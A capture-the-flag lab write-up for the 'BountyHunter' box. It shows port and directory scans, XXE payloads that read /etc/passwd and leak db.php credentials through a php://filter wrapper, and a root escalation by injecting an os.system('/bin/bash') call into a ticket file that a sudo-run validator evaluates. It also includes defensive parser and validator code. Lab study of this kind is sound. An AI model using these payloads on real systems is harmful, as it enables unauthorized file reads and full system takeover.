BountyHunter
Difficulty = Easy
First of all, we run our Nmap scan:

```text
# Nmap 7.94 scan initiated Thu Aug 10 12:10:16 2023 as: nmap -p- -sCV --min-rate=1000 -oN nmap.txt -v 10.10.11.100
Increasing send delay for 10.10.11.100 from 40 to 80 due to 87 out of 289 dropped probes since last increase.
Warning: 10.10.11.100 giving up on port because retransmission cap hit (10).
Increasing send delay for 10.10.11.100 from 640 to 1000 due to 79 out of 262 dropped probes since last increase.
Nmap scan report for 10.10.11.100
Host is up (0.23s latency).
Not shown: 45138 closed tcp ports (conn-refused), 20395 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 d4:4c:f5:79:9a:79:a3:b0:f1:66:25:52:c9:53:1f:e1 (RSA)
|   256 a2:1e:67:61:8d:2f:7a:37:a7:ba:3b:51:08:e8:89:a6 (ECDSA)
|_  256 a5:75:16:d9:69:58:50:4a:14:11:7a:42:c1:b6:23:44 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
|_http-title: Bounty Hunters
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Aug 10 12:16:07 2023 -- 1 IP address (1 host up) scanned in 351.09 seconds
```
- Navigating to port 80 (HTTP) gives us a website.
- Viewing the source doesn't seem to show much, except for a few clues to test out vulnerabilities on the website with a security tool called Burp Suite.
- Also, clicking "portal" on the web page takes us here:
- But after clicking "Go here" on the web page we get another web page, which looks like a Bounty Report System (Trust me, shit doesn't work).
- Fired up Burp Suite and, after numerous tests, I noticed that this page is vulnerable to XXE injection. Payload:

```xml
<?xml version="1.0" ?>
<!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]>
<data>&example;</data>
```
- Just to be sure we are doing the right thing, a directory brute-force:

```text
sec-fortress@Pwn-F0rk-3X3C:~/HTB/BountyHunter$ gobuster dir -u http://10.10.11.100/ -w ~/SecLists-master/Discovery/Web-Content/big.txt -b 401,400,400,501,402,404,403 -x bak,zip,php,PHP,txt,html -t 40 2>/dev/null
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.11.100/
[+] Method:                  GET
[+] Threads:                 40
[+] Wordlist:                /home/sec-fortress/SecLists-master/Discovery/Web-Content/big.txt
[+] Negative Status codes:   404,403,401,400,501,402
[+] User Agent:              gobuster/3.5
[+] Extensions:              php,PHP,txt,html,bak,zip
[+] Timeout:                 10s
===============================================================
2023/08/10 12:29:18 Starting gobuster in directory enumeration mode
===============================================================
/assets               (Status: 301) [Size: 313] [--> http://10.10.11.100/assets/]
/css                  (Status: 301) [Size: 310] [--> http://10.10.11.100/css/]
/db.php               (Status: 200) [Size: 0]
/index.php            (Status: 200) [Size: 25169]
/js                   (Status: 301) [Size: 309] [--> http://10.10.11.100/js/]
/portal.php           (Status: 200) [Size: 125]
/resources            (Status: 301) [Size: 316] [--> http://10.10.11.100/resources/]
===============================================================
2023/08/10 12:52:54 Finished
===============================================================
```
- Yeah, we can definitely read files on the server. Now we need one more important file, maybe one containing stored SSH creds.
- After much enumeration, I decided to check each and every directory from our gobuster scan, and found out that db.php returns an empty page. Why?? 🤔
- After much reading, there is a way to print out the content of PHP files through XXE injection using a PHP wrapper (php://filter/convert.base64-encode/resource=file.php); you can read more on it here.
- Doing this to our target gives us base64-encoded text. Payload:

```xml
<?xml version="1.0" ?>
<!DOCTYPE replace [<!ENTITY example SYSTEM "php://filter/convert.base64-encode/resource=db.php"> ]>
<data>&example;</data>
```

- Looks like we got a password; let's try it out on SSH with the user development.
- It works:
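The report form on the box is PHP, but the fix is the same in any XML parser: refuse the DTD outright, so no entity can ever be declared. As an added defender-side example (not code from the box; the element names and SAFE_REPORT are constructed for this example, the two payloads are the ones used above), a Python parser that still reads a normal report but rejects both XXE payloads:

```python
from xml.parsers import expat

# Constructed sample submissions: SAFE_REPORT is made up for this example,
# the two payloads are the ones shown in the writeup.
SAFE_REPORT = ('<?xml version="1.0"?><report><title>Test report</title>'
               '<cwe>611</cwe><reward>100</reward></report>')
XXE_FILE_PAYLOAD = ('<?xml version="1.0" ?><!DOCTYPE foo [<!ENTITY example '
                    'SYSTEM "/etc/passwd"> ]><data>&example;</data>')
XXE_FILTER_PAYLOAD = ('<?xml version="1.0" ?><!DOCTYPE replace [<!ENTITY example '
                      'SYSTEM "php://filter/convert.base64-encode/resource=db.php"> ]>'
                      '<data>&example;</data>')


class UnsafeXMLError(ValueError):
    """Raised when a submitted report declares a DTD."""


def parse_report(doc: str) -> dict:
    """Return {child element: text} for a flat report, refusing any DOCTYPE.

    With no DTD allowed nothing can be declared, so a stray &name; reference
    fails as 'undefined entity' instead of being expanded from a file.
    """
    parser = expat.ParserCreate()
    fields, open_tags, buf = {}, [], []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXMLError(f"DOCTYPE {name!r} is not allowed in a report")

    def on_start(tag, attrs):
        open_tags.append(tag)
        buf.clear()

    def on_end(tag):
        open_tags.pop()
        if open_tags:  # a child of the root element: keep its text
            fields[tag] = "".join(buf).strip()

    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    parser.CharacterDataHandler = buf.append
    parser.Parse(doc, True)
    return fields


def report_is_safe(doc: str) -> bool:
    """True when the document parses with no DTD and no unresolved entity."""
    try:
        parse_report(doc)
    except (UnsafeXMLError, expat.ExpatError):
        return False
    return True
```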
Privilege Escalation
Since we have gotten a shell as a normal user in the default home directory, let's escalate privileges 😀
- First of all, I ran `sudo -l` to confirm whether there are executables/binaries we can run with sudo.
- There is; it looks like a ticket validator. Let's see what we can do with it.
Just a Python file that validates tickets 🤔, let's read the source code.
- Hmmmmmm, here is what I think:
- When it prompts us for a ticket file, we need to specify a file in markdown format.
- Once this is validated, it opens the file and checks if the first line has `# Skytrain Inc`.
- It also checks if the second line has `## Ticket to`.
- It then looks for a line with numbers that, added together, come to more than 100.
- I decided to change to the /opt/skytrain_inc/invalid_tickets folder and saw sample code.
- Since we are not able to write to this file, I created a sample and directed it to /tmp, named it segun.py, then gave it 777 permissions.
- I edited the file and changed it from this:

```markdown
# Skytrain Inc
## Ticket to New Haven
__Ticket Code:__
**31+410+86**
##Issued: 2021/04/06
#End Ticket
```

To this:

```markdown
# Skytrain Inc
## Ticket to New Haven
__Ticket Code:__
**18 + __import__('os').system('/bin/bash')**
##Issued: 2021/04/06
#End Ticket
```
- … and we got Root, Bankkaaaaiii 🎎
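The root shell comes from the validator evaluating the ticket-code line as Python while running under sudo. As an added example (not the box's ticket_validator.py), here is a validator that applies the three checks described above by matching the code line against a strict grammar and summing integers, so the injected ticket is rejected instead of executed; VALID_TICKET and INJECTED_TICKET are the two tickets shown above, LOW_TICKET is constructed:

```python
import re

# Constructed sample tickets: VALID_TICKET and INJECTED_TICKET are the two
# ticket files shown in the writeup; LOW_TICKET is made up for this example.
VALID_TICKET = """# Skytrain Inc
## Ticket to New Haven
__Ticket Code:__
**31+410+86**
##Issued: 2021/04/06
#End Ticket
"""
INJECTED_TICKET = VALID_TICKET.replace(
    "**31+410+86**", "**18 + __import__('os').system('/bin/bash')**")
LOW_TICKET = VALID_TICKET.replace("**31+410+86**", "**10 + 20**")

# The only shape a ticket code may take: integers joined by '+', wrapped in **.
TICKET_CODE = re.compile(r"^\*\*\s*(\d+(?:\s*\+\s*\d+)*)\s*\*\*$")


def validate_ticket(text: str) -> bool:
    """Apply the three checks the writeup describes, without eval().

    The code line is matched against TICKET_CODE and summed as integers, so
    a line that is anything other than a plain sum is rejected outright.
    """
    lines = text.splitlines()
    if len(lines) < 2 or lines[0].strip() != "# Skytrain Inc":
        return False
    if not lines[1].startswith("## Ticket to"):
        return False
    for line in lines[2:]:
        if not line.startswith("**"):
            continue
        match = TICKET_CODE.match(line.strip())
        if match is None:
            return False  # not a plain sum: rejected, never executed
        total = sum(int(n) for n in re.split(r"\s*\+\s*", match.group(1)))
        return total > 100
    return False  # no ticket-code line at all
```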